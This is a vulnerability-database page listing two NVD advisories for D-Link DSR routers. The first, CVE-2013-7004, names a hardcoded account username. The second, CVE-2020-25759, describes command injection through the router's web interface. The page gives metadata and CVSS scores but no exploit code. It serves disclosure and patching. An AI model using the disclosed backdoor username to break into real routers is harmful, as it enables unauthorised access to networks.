Vulnerabilites related to dlink - dsr-1000n
Vulnerability from fkie_nvd
Published
2013-12-19 04:24
Modified
2025-04-11 00:51
Severity ?
Summary
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2616EA9D-842A-4C08-BEC0-DD0DE15627C4",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "86F457CD-2B3A-4571-941B-CEEAD52635C3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "7D5FB42D-B664-4CD1-A9BE-BEEB3D2455F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "0836B735-04EB-46DA-A5FD-918CF254DC6D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "C40D5762-D950-4C59-8E60-AD63A5C4F43E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "CD052065-A62C-4E77-AF30-A7BFE87BEF0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "84589477-A03F-4350-8F48-AA65A3E2F8EB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "73B9957F-92B8-471A-90C1-541857228220",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "BB19EF7D-8CDD-4640-B272-2B31C6C8DC40",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "D3DE0EAD-26FE-4A08-8B3F-94B7B46B3EE2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "3EEC400B-B9A7-4672-98BB-57EE722FDDBB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F2655D2C-0A71-4F14-8CB6-9A8E5B0BA2D2",
"versionEndIncluding": "1.05b48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8875595-6A45-41F4-BD4F-88E4B01987FB",
"versionEndIncluding": "1.08b39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
"matchCriteriaId": "4D87E55E-8FB9-46DD-B7E3-0FF5844AACCE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
"matchCriteriaId": "7054BD9D-2CBD-4EB2-A52C-6EAD0DF16CEA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
"matchCriteriaId": "7C7D6C20-02AB-45C2-8DF6-7406EF4B9E09",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
"matchCriteriaId": "20584156-C553-4AEA-A19C-A4BB67B5390A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
"matchCriteriaId": "1CB44CCA-AC5E-4169-A4DA-8873C1435C04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "83CA3AD5-8BB3-4C52-B1D4-57F24C7E3ECE",
"versionEndIncluding": "1.08b29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
"matchCriteriaId": "EDDC40C8-1BB2-4151-BAA4-E28C5AC94654",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
"matchCriteriaId": "ADB61873-D7C7-400D-AAA3-5F65F459B573",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
"matchCriteriaId": "2AD638F5-3A13-45D2-A343-1733611C5173",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
"matchCriteriaId": "9A27097B-44CF-47FB-90D1-0D244209E9DC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CA8E760B-FBD1-4949-9E7C-35E216094B58",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "F0478AA5-8740-4458-855A-11804597FA6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "A6009D02-5CE9-4D08-8C6A-005F66ED8A29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "2DBC6011-8C8A-4EAA-8B6B-933C128E7A97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "540C7261-9352-4CF1-BCF8-13615EFB7C4E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "31C51D13-005D-4CB0-AB05-D38CC4E5096B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "4C3F3332-EEE2-492F-9585-62E4256ECBC5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "0DE1C593-B0E7-4715-9AA5-CF7A3A87F05E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "2D4D1637-5291-45CD-BA6A-B71D9199F0F2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "25136989-A83E-4C65-A354-8A0E2101EE26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "36E387CF-AAE4-4EED-A7E2-6D2FE9B5933F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "289208CD-49AB-48A8-AD2E-BF4AFA479990",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
"matchCriteriaId": "0FA9027F-9EBE-45FB-8128-E1E27F1B12EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "90E36C7E-02A1-4389-A706-B73D6C236E50",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "D5146B3C-CC4C-49C4-9B8B-BF9FC3E45293",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "79117184-9444-443B-9CF8-F4D2E19413A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "AD92EB60-B33E-4653-BE5B-449DC18E073F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "DAE86995-60E0-4F50-A008-EBB227CC4207",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "9B6BA51E-FCC6-4BCC-A4FF-AF49602C6D5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "484A7789-9A84-4E01-B7C8-97FC769D21AA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "592C6173-8084-4857-AD6A-DDF9F66CE881",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "A8025D5C-331B-4A62-9A0D-29EA63E7AB30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "2987ACFB-FE89-4901-8A64-B5B61F4D4EE1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1F360917-0D86-4B7C-8699-EAE3A5155DAD",
"versionEndIncluding": "1.08b39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
"matchCriteriaId": "91015BD6-F1EF-4E77-991E-5A895DF204FB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
"matchCriteriaId": "36443128-6668-4FB6-9B96-1C695EB5B0BD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
"matchCriteriaId": "11E46972-D923-4AB7-BC2E-49D9DBC65202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
"matchCriteriaId": "71900351-AF65-4AFB-A77E-361075583F43",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
"matchCriteriaId": "0540F822-7F53-4282-A480-6E4A15994AF8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8A6B7598-20C1-4F1A-BFA8-16C66D210216",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
"matchCriteriaId": "6F9A4E2D-8F74-4CD3-85F0-5DA4749B0F9F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "2DA26493-2F60-41C1-9563-75FAA116DBA2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "4D5BA908-B289-4917-8AE3-E57DACB93501",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "9B94BCF9-13FC-4930-92A4-6AF97699672B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "F1AED08D-47B4-4A13-8291-2E49AEB1B69F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "2904D8F1-633D-4DF8-9808-2961998CE510",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "FE195794-EDE9-477A-9934-8CE2ED1B19E7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "BC8C2F15-6867-4647-9D2F-8F3D9F3054DD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF08CD6-A360-4291-8159-DB2A07B8F2A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "DDDBCCF6-71B8-45A8-86C4-97B622793179",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "FF0BFC1A-B6DF-4D2E-9DD9-566E20CAD172",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username."
},
{
"lang": "es",
"value": "D-Link DSR-150 con firmware anterior a 1.08B44; DSR-150N con firmware anterior a 1.05B64; DSR-250 y DSR-250N con firmware anterior a 1.08B44; y DSR-500, DSR-500N, DSR-1000, y DSR-1000N con firmware anterior a 1.08B77 tienen incrustado el nombre de usuario gkJ9232xXyruTRmY, lo cual facilita a atacantes remotos obtener acceso aprovechando el conocimiento del nombre de usuario."
}
],
"id": "CVE-2013-7004",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-12-19T04:24:57.463",
"references": [
{
"source": "cve@mitre.org",
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"source": "cve@mitre.org",
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"source": "cve@mitre.org",
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"source": "cve@mitre.org",
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-255"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-12-15 20:15
Modified
2024-11-21 05:18
Severity ?
Summary
An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dsr-150_firmware | * | |
| dlink | dsr-150 | - | |
| dlink | dsr-150n_firmware | * | |
| dlink | dsr-150n | - | |
| dlink | dsr-250_firmware | * | |
| dlink | dsr-250 | - | |
| dlink | dsr-250n_firmware | * | |
| dlink | dsr-250n | - | |
| dlink | dsr-500_firmware | * | |
| dlink | dsr-500 | - | |
| dlink | dsr-500n_firmware | * | |
| dlink | dsr-500n | - | |
| dlink | dsr-500ac_firmware | * | |
| dlink | dsr-500ac | - | |
| dlink | dsr-1000_firmware | * | |
| dlink | dsr-1000 | - | |
| dlink | dsr-1000n_firmware | * | |
| dlink | dsr-1000n | - | |
| dlink | dsr-1000ac_firmware | * | |
| dlink | dsr-1000ac | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "93C5755D-5EB7-449E-81D9-20DBA0F36345",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3AE6313B-F71A-4AE4-8778-E30A93B1942B",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1ABEF03D-2411-4B84-BB67-831DC0164C9D",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "834CDDBF-DC00-40FD-86C1-9AF2A42BB317",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "64D78EB2-B98D-4196-B678-BF43227770F2",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A56B78EB-01FB-472A-B147-F2DF9E1C70E1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC42D575-0178-43EF-814F-DE6D738FB2A5",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC082E6B-E33F-4A69-A9B7-5E4D2D03C996",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "19A81670-E7DA-4179-A0A5-00938299BF6C",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82F0849C-8622-4839-BE2B-DCDE9CE7B257",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7F64A55-D6BF-4440-8336-22E5C1BF36D0",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3DD4F77B-72B4-4261-884C-8F17B52A4643",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests."
},
{
"lang": "es",
"value": "Se detect\u00f3 un problema en los dispositivos D-Link DSR-250 versi\u00f3n 3.17.\u0026#xa0;Determinada funcionalidad en la interfaz web Unified Services Router podr\u00eda permitir a un atacante autenticado ejecutar comandos arbitrarios, debido a una falta de comprobaci\u00f3n de entradas proporcionadas en peticiones HTTP POST de m\u00faltiples partes"
}
],
"id": "CVE-2020-25759",
"lastModified": "2024-11-21T05:18:41.377",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-12-15T20:15:16.307",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
